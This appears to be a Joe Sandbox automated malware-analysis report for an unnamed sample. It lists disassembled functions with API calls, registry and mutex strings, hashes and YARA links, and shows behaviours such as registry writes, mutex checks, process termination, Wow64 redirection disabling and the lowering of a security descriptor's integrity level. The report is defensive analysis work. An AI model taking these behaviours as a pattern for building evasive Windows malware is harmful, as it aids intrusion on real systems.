                                                                            control_flow_graph 742 7cb510-7cb54f call 7e359a RegOpenKeyW 745 7cb555-7cb570 RegSetValueExW 742->745 746 7cb551-7cb553 742->746 748 7cb580-7cb58a RegCloseKey 745->748 749 7cb572-7cb57e RegCloseKey 745->749 747 7cb58f-7cb592 746->747 748->747 749->747
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CB52F
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007CB547
                                                                            • RegSetValueExW.KERNELBASE(?,{BC63A593-23AA-4808-8FB5-F192F2F6D1F9},00000000,00000003,007D4285,0000000C), ref: 007CB568
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CB576
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CB519
                                                                            • SOFTWARE\%s, xrefs: 007CB51E
                                                                            • {BC63A593-23AA-4808-8FB5-F192F2F6D1F9}, xrefs: 007CB55F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue__snwprintf
                                                                            • String ID: SOFTWARE\%s${BC63A593-23AA-4808-8FB5-F192F2F6D1F9}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 2100281157-1712169463
                                                                            • Opcode ID: 6763e427b51dfbdd04c6063b0e87cdf83a46621a493ea6a9328e3c96245323c6
                                                                            • Instruction ID: 8210ace4eb853c8dca5c2291d8481ccb8f9beb5e13a3897eb44b3579304c2b1a
                                                                            • Opcode Fuzzy Hash: 6763e427b51dfbdd04c6063b0e87cdf83a46621a493ea6a9328e3c96245323c6
                                                                            • Instruction Fuzzy Hash: F5011275644308FBDB14DBB4ED8AFBA7368EB48B00F104D58B615A6280D6BADB1497A0
                                                                            Function 007C1900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 750 7c1900-7c1909 751 7c190f-7c191b 750->751 752 7c1c0f 751->752 753 7c1921-7c1928 751->753 759 7c1c14-7c1c20 call 7cfac0 752->759 760 7c18f4-7c18fe 752->760 755 7c195d-7c1999 call 7d38d0 753->755 756 7c192a-7c195b call 7d0ca0 753->756 765 7c199f-7c19a6 755->765 756->765 766 7c1c31-7c1c39 call 7dc1e0 759->766 767 7c1c22-7c1c2b WaitForSingleObject 759->767 760->751 768 7c19ac-7c19b3 765->768 769 7c1bff-7c1c04 Sleep 765->769 783 7c1c48-7c1c4a ExitProcess 766->783 784 7c1c3b-7c1c42 Wow64DisableWow64FsRedirection 766->784 767->766 771 7c1b3f-7c1b90 WaitForMultipleObjects WaitForSingleObject 768->771 772 7c19b9-7c19c7 768->772 773 7c1c0a 769->773 774 7c1b9b-7c1ba2 771->774 775 7c1b92-7c1b99 771->775 777 7c19c9-7c19dd WaitForSingleObject 772->777 778 7c1a37-7c1a45 772->778 773->752 781 7c1ba4-7c1bad TerminateProcess 774->781 782 7c1bb3-7c1bba 774->782 775->752 777->778 785 7c19df-7c19fe OpenMutexW 777->785 779 7c1ab6-7c1ac4 778->779 780 7c1a47-7c1a5b WaitForSingleObject 778->780 789 7c1b35 779->789 790 7c1ac6-7c1ada WaitForSingleObject 779->790 780->779 786 7c1a5d-7c1a7c OpenMutexW 780->786 781->782 787 7c1bbc-7c1bc3 CloseHandle 782->787 788 7c1bc9-7c1bd0 782->788 784->783 791 7c1a00-7c1a13 WaitForSingleObject 785->791 792 7c1a21-7c1a28 785->792 793 7c1a7e-7c1a92 WaitForSingleObject 786->793 794 7c1aa0-7c1aa7 786->794 787->788 795 7c1bdf-7c1bfd call 7e3520 Sleep 788->795 796 7c1bd2-7c1bd9 CloseHandle 788->796 789->759 790->789 797 7c1adc-7c1afb OpenMutexW 790->797 798 7c1a1f 791->798 799 7c1a15 791->799 792->778 800 7c1a2a-7c1a31 CloseHandle 792->800 801 7c1a9e 793->801 802 7c1a94 793->802 794->779 803 7c1aa9-7c1ab0 CloseHandle 794->803 795->773 796->795 805 7c1afd-7c1b11 WaitForSingleObject 797->805 806 7c1b1f-7c1b26 797->806 798->777 799->759 800->778 801->780 802->759 803->779 808 7c1b1d 805->808 809 7c1b13 805->809 806->789 810 7c1b28-7c1b2f CloseHandle 806->810 808->790 809->759 810->789
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007C19D2
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{04D458D6-7C6C-445F-AEAD-313D698F1F0A}), ref: 007C19EB
                                                                            • WaitForSingleObject.KERNEL32(000002EC,0000000A), ref: 007C1A08
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Strings
                                                                            • {04D458D6-7C6C-445F-AEAD-313D698F1F0A}, xrefs: 007C19DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$Wow64$DisableExitMutexOpenProcessRedirection
                                                                            • String ID: {04D458D6-7C6C-445F-AEAD-313D698F1F0A}
                                                                            • API String ID: 3042449743-604615042
                                                                            • Opcode ID: 24ac5151c6ba6b8b7fe4961cfd428b763a1187ca2ad6a519c04e3d8ce8139798
                                                                            • Instruction ID: 4d40af70241b77c7febe8e055cca4196274e1e2ca3e0078a99e607a47ef60389
                                                                            • Opcode Fuzzy Hash: 24ac5151c6ba6b8b7fe4961cfd428b763a1187ca2ad6a519c04e3d8ce8139798
                                                                            • Instruction Fuzzy Hash: F1212CB0900118DBCB20DF54DD89F9C77BABBC6305F6089ADE249A6192CBB899C5CF11
                                                                            Function 007DC570 Relevance: 10.6, APIs: 7, Instructions: 62filememoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 811 7dc570-7dc599 CreateFileW 812 7dc59b-7dc5ae GetFileSize 811->812 813 7dc614 811->813 814 7dc60a-7dc60e CloseHandle 812->814 815 7dc5b0-7dc5c3 LocalAlloc 812->815 816 7dc616-7dc619 813->816 814->813 815->814 817 7dc5c5-7dc5df ReadFile 815->817 818 7dc5e1-7dc5e7 817->818 819 7dc600-7dc604 LocalFree 817->819 818->819 820 7dc5e9-7dc5fe CloseHandle 818->820 819->814 820->816
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,007D430B,?,00000000), ref: 007DC58C
                                                                            • GetFileSize.KERNEL32(000000FF,00000000,?,007D430B,?), ref: 007DC5A1
                                                                            • LocalAlloc.KERNELBASE(00000040,000000FF,?,007D430B), ref: 007DC5B6
                                                                            • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 007DC5D7
                                                                            • CloseHandle.KERNELBASE(000000FF), ref: 007DC5ED
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC604
                                                                            • CloseHandle.KERNEL32(000000FF,?,007D430B), ref: 007DC60E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction ID: 13bd648244198235f3a40f1d8640de305ae71bb9b799c6b9421bbf7a542ddc84
                                                                            • Opcode Fuzzy Hash: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction Fuzzy Hash: 56214D75A00208FBDB14DFA4CC88FAEB775FB48701F108545F615B72D0DA38AA41DB58
                                                                            Function 007DC4B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 007DC4E6
                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007DC500
                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 007DC51C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC529
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                            • API String ID: 173816248-495562761
                                                                            • Opcode ID: a35943da90024b21e7100bc03df4350d0a54538a23dbeb4dbb9f4f898a4dd56a
                                                                            • Instruction ID: 803e055c32651640ad8c7d29b22b7ea696060e681f677748f855ba9d427a78d7
                                                                            • Opcode Fuzzy Hash: a35943da90024b21e7100bc03df4350d0a54538a23dbeb4dbb9f4f898a4dd56a
                                                                            • Instruction Fuzzy Hash: B8014CB1A00309ABEB14CF90DC55FAFB7B9AB44B00F104549F601AA2C0D7B5AA04CFA1
                                                                            Function 007CB4A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 826 7cb4a0-7cb4f3 call 7e359a RegGetValueW 829 7cb4fe 826->829 830 7cb4f5-7cb4fa 826->830 831 7cb500-7cb503 829->831 830->831
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CB4BF
                                                                            • RegGetValueW.KERNELBASE(80000001,?,{BC63A593-23AA-4808-8FB5-F192F2F6D1F9},00000008,00000000,007D4257,0000000C), ref: 007CB4EB
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CB4A9
                                                                            • SOFTWARE\%s, xrefs: 007CB4AE
                                                                            • {BC63A593-23AA-4808-8FB5-F192F2F6D1F9}, xrefs: 007CB4DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value__snwprintf
                                                                            • String ID: SOFTWARE\%s${BC63A593-23AA-4808-8FB5-F192F2F6D1F9}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3635966236-1712169463
                                                                            • Opcode ID: fdace8a9778dfec436e3fcfeb7f20239f8de634f4ac773aecb0053ee6bd99a6e
                                                                            • Instruction ID: dbb84bf702d580e642a6be0f98cd9093cdebdf1e88ae91413bf468170db80ec6
                                                                            • Opcode Fuzzy Hash: fdace8a9778dfec436e3fcfeb7f20239f8de634f4ac773aecb0053ee6bd99a6e
                                                                            • Instruction Fuzzy Hash: E2F0A77164820CF6E710D6A49C4BFB67368E744700F1045587A04D62C0E6F99A1557D1
                                                                            Function 007C5CC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _malloc
                                                                            • String ID: LdrGetProcedureAddress
                                                                            • API String ID: 1579825452-3058439150
                                                                            • Opcode ID: 031b101ac7a458cd4ff65fd78a907b344863d4ea685438b63b302c087ad51e18
                                                                            • Instruction ID: 4962e60b126e057f4333611cee907068e13063cad5e86429c8236ae85b1f9abc
                                                                            • Opcode Fuzzy Hash: 031b101ac7a458cd4ff65fd78a907b344863d4ea685438b63b302c087ad51e18
                                                                            • Instruction Fuzzy Hash: 2BA107B0D00218DBDB24DB98CD95FEEB7B5BB48314F54829CE40A67281DB3A6E85CF51
                                                                            Function 007DCD20 Relevance: 5.0, APIs: 4, Instructions: 49memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNELBASE(00000040,00005004), ref: 007DCD2D
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DCD57
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD94
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2012307162-0
                                                                            • Opcode ID: 4affb810623bbb3e524e6f07ef52bcf7dc4592227fcc1c72c734e40287778539
                                                                            • Instruction ID: 16aaf7e5feef670fc73d7381e9397d20d9f9a1f9bd717edea38e013efb39296f
                                                                            • Opcode Fuzzy Hash: 4affb810623bbb3e524e6f07ef52bcf7dc4592227fcc1c72c734e40287778539
                                                                            • Instruction Fuzzy Hash: 241130B9E00208FFCB01DFA4D849BAEBBB5FB48300F1085A5E505A7381D7789A41CF54
                                                                            Function 007C1A1A Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2411899824-0
                                                                            • Opcode ID: b1190f7e16fe082af82714e22ad639daa318da4ac696de9ebcd800bbd7dca017
                                                                            • Instruction ID: 962cddc0d2b9394fbc2e0b19e13b06d3b46fb3317acd299b78d4fae67e8871e8
                                                                            • Opcode Fuzzy Hash: b1190f7e16fe082af82714e22ad639daa318da4ac696de9ebcd800bbd7dca017
                                                                            • Instruction Fuzzy Hash: 6CE01271480114DBCB34AB709C88F683735BB86311F508A3DF116A41A2CB3D8585DB61
                                                                            Function 007C1A99 Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2411899824-0
                                                                            • Opcode ID: 739ab2796aa9da2c9dbc447e33c6ec6e13b18e397406d33285bb6366944e437a
                                                                            • Instruction ID: 962cddc0d2b9394fbc2e0b19e13b06d3b46fb3317acd299b78d4fae67e8871e8
                                                                            • Opcode Fuzzy Hash: 739ab2796aa9da2c9dbc447e33c6ec6e13b18e397406d33285bb6366944e437a
                                                                            • Instruction Fuzzy Hash: 6CE01271480114DBCB34AB709C88F683735BB86311F508A3DF116A41A2CB3D8585DB61
                                                                            Function 007C1B3A Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2411899824-0
                                                                            • Opcode ID: 0fdc8a64920638fbf9a6281b97320ada6dade2c112b712b2f5467f43bb7e562d
                                                                            • Instruction ID: 962cddc0d2b9394fbc2e0b19e13b06d3b46fb3317acd299b78d4fae67e8871e8
                                                                            • Opcode Fuzzy Hash: 0fdc8a64920638fbf9a6281b97320ada6dade2c112b712b2f5467f43bb7e562d
                                                                            • Instruction Fuzzy Hash: 6CE01271480114DBCB34AB709C88F683735BB86311F508A3DF116A41A2CB3D8585DB61
                                                                            Function 007C1B18 Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2411899824-0
                                                                            • Opcode ID: ffbc423df5ff357b78b05ce5b70efee1a68a456c217c87a5b6638c6a2e1e99ac
                                                                            • Instruction ID: 962cddc0d2b9394fbc2e0b19e13b06d3b46fb3317acd299b78d4fae67e8871e8
                                                                            • Opcode Fuzzy Hash: ffbc423df5ff357b78b05ce5b70efee1a68a456c217c87a5b6638c6a2e1e99ac
                                                                            • Instruction Fuzzy Hash: 6CE01271480114DBCB34AB709C88F683735BB86311F508A3DF116A41A2CB3D8585DB61
